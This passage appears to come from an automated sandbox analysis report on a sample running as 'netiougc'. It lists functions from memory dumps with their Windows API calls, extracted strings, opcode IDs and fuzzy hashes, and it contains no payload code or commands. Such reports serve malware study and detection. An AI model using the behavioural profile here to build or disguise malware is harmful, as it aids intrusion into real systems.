                            • Opcode Fuzzy Hash: 107479310989bd27814fd21d64a1c36b92a04000098039477319e4c58e909f32
                            • Instruction Fuzzy Hash: 13312CB6A1060AAFDB00DFD8CC809EEB7B9BF88304B148559E515AB214D775EE458BA0
                            Function 032244E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03224552
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: ad6e33b8d4698c7c43c606e25c9bf4f40c21fa71ffe3f46a1f23721449fc8031
                            • Instruction ID: 2ddbb751675785b09c3c65643577a06b49ffa5f2b3dbbabaf97b5c15fbd209b0
                            • Opcode Fuzzy Hash: ad6e33b8d4698c7c43c606e25c9bf4f40c21fa71ffe3f46a1f23721449fc8031
                            • Instruction Fuzzy Hash: A3015EB9D1020EBBDF10EBA5DC45F9DB7789B14208F0441A5E9089B240FA71E798CB91
                            Function 032384E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,03227DF3,00000010,?,?,?,00000044,?,00000010,03227DF3,?,?,?), ref: 03238543
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 9806351269be84981e4843302406ddd54db5c234d9d2f734d5c08ea05616d791
                            • Instruction ID: a11117a8d06ea2b03a8a2a2d54908ecc0f791e02e41afbcb57ff3bfff3aa75e3
                            • Opcode Fuzzy Hash: 9806351269be84981e4843302406ddd54db5c234d9d2f734d5c08ea05616d791
                            • Instruction Fuzzy Hash: 3701C4B2214208BBCB44DE89DC80EEB77EDEF8D714F408108BA0DE7240DA71F8518BA4
                            Function 032196E0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03219725
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: e67f049cea204d0c1459009e71752161978d8b9e63de46b4c2550ca9955272de
                            • Instruction ID: ed19f141f2c5f3866e86fc5084573813ff7fcbb25529078b7fa05cc3a7ab5caa
                            • Opcode Fuzzy Hash: e67f049cea204d0c1459009e71752161978d8b9e63de46b4c2550ca9955272de
                            • Instruction Fuzzy Hash: 9AF039B73A031436E320A6E99C02FEBB39C8F91B61F140025F70CEA180D9A2B49142E9
                            Function 032196DB Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03219725
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 4cb594bfc38ee100ba69b7612f99811ba0ec49cd5375128f137a96ea7abc7136
                            • Instruction ID: d2e9620d9d5331bd2c3a115cf39de9b5265504106530a824dfcf80e804364f7b
                            • Opcode Fuzzy Hash: 4cb594bfc38ee100ba69b7612f99811ba0ec49cd5375128f137a96ea7abc7136
                            • Instruction Fuzzy Hash: DAF06DB729030437E330A699CC42FDBB79CCF96B61F250014F708AF1C0D9A2B89142E9
                            Function 03238400 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(03221719,?,03234E53,03221719,03234797,03234E53,?,03221719,03234797,00001000,?,?,03239CCD), ref: 0323843F
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 8e739d84df725d30fdb527b24dd1d2b1529f58f19dbd7a5eecf565546dbdda6e
                            • Instruction ID: 33c11f9ddaf218ccff863f3caa84f702418bd30ff4ab218c82be61974a418818
                            • Opcode Fuzzy Hash: 8e739d84df725d30fdb527b24dd1d2b1529f58f19dbd7a5eecf565546dbdda6e
                            • Instruction Fuzzy Hash: 4AE06DB52003047BD610EE58DD41F9B37ACDFC9710F004418FA08A7241C770B8108BB4
                            Function 03238450 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFEC4,00000007,00000000,00000004,00000000,03223DB5,000000F4,?,?,?,?,?), ref: 0323848C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 45c5b3800b981f43542a4392730af974c9a10f132f0c51a56b02927ff5448233
                            • Instruction ID: 345ef0555baae72ffc8b4a4a497b8431663cee7572a94a5fb31d7c2435424dc3
                            • Opcode Fuzzy Hash: 45c5b3800b981f43542a4392730af974c9a10f132f0c51a56b02927ff5448233
                            • Instruction Fuzzy Hash: D4E06DB52102047FD610EE58DD45F9B33ACEFCA750F404008FA09AB281C6B0B8208AB5
                            Function 03227E30 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 03227E5C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 9f0e2f7d07273bec20e0d1d3c6879792984373e58d74791499d4e3b2eb7e67c9
                            • Instruction ID: ad734001510823e76f482e439508d04f0f396277d95645670086dc7944fbf679
                            • Opcode Fuzzy Hash: 9f0e2f7d07273bec20e0d1d3c6879792984373e58d74791499d4e3b2eb7e67c9
                            • Instruction Fuzzy Hash: 66E0867526430437FB24FAACDC45FAA33589B48B24F2C4660B95CDB3C3E579F99142A4
                            Function 03227C40 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,03221A00,03236EB7,03234797,?), ref: 03227C73
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: f5b4919420d14309ab2cd9c68ba578369ab67d98b4bb87832a9ec2d2de857eb2
                            • Instruction ID: 9e50c0b4361ddc3a33539a18aba8f8a37e2a3703403f89580a2d7e86e0de0b71
                            • Opcode Fuzzy Hash: f5b4919420d14309ab2cd9c68ba578369ab67d98b4bb87832a9ec2d2de857eb2
                            • Instruction Fuzzy Hash: BED05EB52503043BF700E6B49D06F96338C8B50754F058064FA08EB2C2ECA6F06481AA
                            Function 03A22C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6dfeec1c633c8d6c4385d1dcbf860c2bfa48129cc3765e06f49168c483a0cfa8
                            • Instruction ID: a43cdb92044dac58370211588945ce2b524cf43bc7939715f7d5940097793273
                            • Opcode Fuzzy Hash: 6dfeec1c633c8d6c4385d1dcbf860c2bfa48129cc3765e06f49168c483a0cfa8
                            • Instruction Fuzzy Hash: 70B09B71D015D5C5DA51E764460C7177D1467D1701F1AC477F2034641E473DC5D5F175

                            Non-executed Functions

                            Function 038C0542 Relevance: .1, Instructions: 147COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906209996.00000000038C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 038C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_38c0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3b16f9740bc6c60872e040bfd12424c0d7c40554266ef95c8fd9ac33e73fd4b
                            • Instruction ID: 2e0f7512ec44a3881f478cad96ec501fb30aaff48642d9b04af5c889cd5c53d2
                            • Opcode Fuzzy Hash: e3b16f9740bc6c60872e040bfd12424c0d7c40554266ef95c8fd9ac33e73fd4b
                            • Instruction Fuzzy Hash: 884106B5928B4D8FD368EFAC9081676B3E1FB85340F50066ED88AC7252EB74E4428785
                            Function 03222438 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 208c88af73be69dd9a2828a30ddeceda450f6ee0e224b107c824a44f54a38b30
                            • Instruction ID: 352392fe95fc75163bd94bc1804b7704c11b68e0eb2fe84b36ac17036f9745d1
                            • Opcode Fuzzy Hash: 208c88af73be69dd9a2828a30ddeceda450f6ee0e224b107c824a44f54a38b30
                            • Instruction Fuzzy Hash: A4D02256A4900C1781513C5FBE017F1FBEC8243252E8813B2EC0CA30449082C02101FD
                            Function 0321E11F Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 429040d495eee60aec18648f6da7f00c4c0942437c2151eafab4e6bf4550db8a
                            • Instruction ID: 906ed598fd1a971e98b72d242b743593642e906ca23d1cb32dc41163b194a77e
                            • Opcode Fuzzy Hash: 429040d495eee60aec18648f6da7f00c4c0942437c2151eafab4e6bf4550db8a
                            • Instruction Fuzzy Hash: D6C08C32B5041803C2300E09B4443F0F3B4E783322F1023A7E80CFB0408B13C84345D8
                            Function 0322241D Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 976cd6d8e69254aefadcd6d8df5d6e6d883f313486619fccb4d138ebbe31b8b9
                            • Instruction ID: 74a342866a500b112e1fbb6dd5e5ca451af92c68ca4063b4fb73ade82ee08deb
                            • Opcode Fuzzy Hash: 976cd6d8e69254aefadcd6d8df5d6e6d883f313486619fccb4d138ebbe31b8b9
                            • Instruction Fuzzy Hash: CBC08C23A102144682010C6978010B0F3B0E5836A2B90A3E2CA08AB106D212C1255B89
                            Function 038CB7B9 Relevance: 56.5, Strings: 45, Instructions: 216COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906209996.00000000038C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 038C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_38c0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                            • API String ID: 0-3558027158
                            • Opcode ID: 2118de033faa286774617f3ab8f4f0db47e50b7d5246f5a20035e05491afa888
                            • Instruction ID: 70a48a44e52239138ceea21903678f9e23850fd5618010c4cf3cc6a0f1b5a8c1
                            • Opcode Fuzzy Hash: 2118de033faa286774617f3ab8f4f0db47e50b7d5246f5a20035e05491afa888
                            • Instruction Fuzzy Hash: B4913FF04583948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                            Function 03A22890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 0a87509e05f80cb8f1f546b8726e4f92751fd3aabb5a8a1f425c8ee54aeb9571
                            • Instruction ID: f1258d9b23fb1c626d68a28b6c7d4a040594c3f428e908bdba9d3d5198b794a1
                            • Opcode Fuzzy Hash: 0a87509e05f80cb8f1f546b8726e4f92751fd3aabb5a8a1f425c8ee54aeb9571
                            • Instruction Fuzzy Hash: 3C51FBB5B041267FCB61DF9D8990A7EFBB8BB49200754866BF865D7641D334DE0087E0
                            Function 03A92410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 2d8648c9c0dc47651748b31b86194c323f9488170d6070314cdbbd4fbca24fa3
                            • Instruction ID: f4fc3d46356b7472a15af7ba3b71139b79c63b1a60913b9fcf113c519e7eef1d
                            • Opcode Fuzzy Hash: 2d8648c9c0dc47651748b31b86194c323f9488170d6070314cdbbd4fbca24fa3
                            • Instruction Fuzzy Hash: B651D575A00649BEEF34DF9CC990A7EB7F9EF84200B04886FE496E7641D774DA408760
                            Function 03A17630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule
                            Strings
                            • Execute=1, xrefs: 03A54713
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A54725
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A546FC
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A54787
                            • ExecuteOptions, xrefs: 03A546A0
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A54742
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A54655
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: f65e1b832b62994e8b3c0db1275126982cf9013f3af17f58defab53aac323f41
                            • Instruction ID: b7de56ef7006abfe32daa15583b6534496a7809d0f268e73dfb445e112cab050
                            • Opcode Fuzzy Hash: f65e1b832b62994e8b3c0db1275126982cf9013f3af17f58defab53aac323f41
                            • Instruction Fuzzy Hash: C2513835A003196EDF10EBA9ED95FAE77B8EF09300F04009FE515AB281EB769E518F54
                            Function 03A2B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                            • Instruction ID: e92c7f1a87ea5cc3ec80cd071b63f75f5d6762ced901135cf5553e6086661413
                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                            • Instruction Fuzzy Hash: 99817A70E066699FDF28CF6CC8917AEBFB6AF46210F1C415FD861A7391C63898408B70
                            Function 03A920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            • Opcode ID: 6c600ee61df5417d29f60dbd380f06c7863440ad5a2ff14372e6ee9511dcfd58
                            • Instruction ID: 8900f1eeb28c319c26e4c17550ce2daf4b049e59d06e7711fad7c0fcdff3356b
                            • Opcode Fuzzy Hash: 6c600ee61df5417d29f60dbd380f06c7863440ad5a2ff14372e6ee9511dcfd58
                            • Instruction Fuzzy Hash: BF21317AA0021DABDB10DF69D940AEEBBF8EF58654F58052BE915E7200E730D9118BA1
                            Function 03A0F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A502E7
                            • RTL: Re-Waiting, xrefs: 03A5031E
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A502BD
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: 7e4231a9e98f2c15f719db97d862edd88930d47bb09c8e726e55b56b93270438
                            • Instruction ID: 9f18ea734c29f2495a8017bb9b4b751b828434ab5c27a7de967a9ec3973c3cad
                            • Opcode Fuzzy Hash: 7e4231a9e98f2c15f719db97d862edd88930d47bb09c8e726e55b56b93270438
                            • Instruction Fuzzy Hash: 07E1BD706087419FD724CF28D984B2AB7E0BF89324F180A6EF9A59B2E1D774D945CB42
                            Function 03A1BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Re-Waiting, xrefs: 03A57BAC
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A57B7F
                            • RTL: Resource at %p, xrefs: 03A57B8E
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: 885130e94543c71d408809103c6a6f3067937b3b98043bee931f58959e12507c
                            • Instruction ID: 1feb9dd380322c0d29e40640ed6bdbe19b5461b8f240ad3a17d60311e41c8bdd
                            • Opcode Fuzzy Hash: 885130e94543c71d408809103c6a6f3067937b3b98043bee931f58959e12507c
                            • Instruction Fuzzy Hash: EE41E3357047029FC724DF29C940B6AB7E5EF88710F040A1EF856DB790DB31E8158BA1
                            Function 03A1B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A5728C
                            Strings
                            • RTL: Re-Waiting, xrefs: 03A572C1
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A57294
                            • RTL: Resource at %p, xrefs: 03A572A3
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 37cc6dfaa61c6b6fff58d684b83a4f6356b65932667b1d6f2b1682e9cc031336
                            • Instruction ID: 50051c9becf2f60ce18b0ca070b31b30ed4a7bbc1e1f9a5867c6776523fa0a82
                            • Opcode Fuzzy Hash: 37cc6dfaa61c6b6fff58d684b83a4f6356b65932667b1d6f2b1682e9cc031336
                            • Instruction Fuzzy Hash: 3641CE35600216AFC724DF25CD41B6AB7A5FB98710F144A1EFC56EB340DB32E8568BE1
                            Function 03A92300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            • Opcode ID: 8214ee22b596647976b0b9bace8c43e8c833cbefb0fdd1327ca239fa13d92cdd
                            • Instruction ID: a4ccf4b2d29aed155b2870cfe32306592b6e7f6cb5da161fe558722997f16862
                            • Opcode Fuzzy Hash: 8214ee22b596647976b0b9bace8c43e8c833cbefb0fdd1327ca239fa13d92cdd
                            • Instruction Fuzzy Hash: 59314376A00619AFDF20DF29DD40BEFB7F8EB58650F44455BE849E7240EB309A458BA0
                            Function 038C2B77 Relevance: 6.3, Strings: 5, Instructions: 28COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906209996.00000000038C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 038C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_38c0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$9p|>$:0=($;&5,$p|89
                            • API String ID: 0-2361401990
                            • Opcode ID: 2f67e6b66ef3ed26618db70a048adf1d61b219af3d50979257d5c0edb95c4956
                            • Instruction ID: 2ba43a6a8e98f3e6dc7608f0e5eeea54dd96e242569a5ccc4bc396e0524c3325
                            • Opcode Fuzzy Hash: 2f67e6b66ef3ed26618db70a048adf1d61b219af3d50979257d5c0edb95c4956
                            • Instruction Fuzzy Hash: 4BF0A775028B948FD708AF04C44499A76D1FF8834DF801A9DE48ACF151DB79C6468B47
                            Function 03A27D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
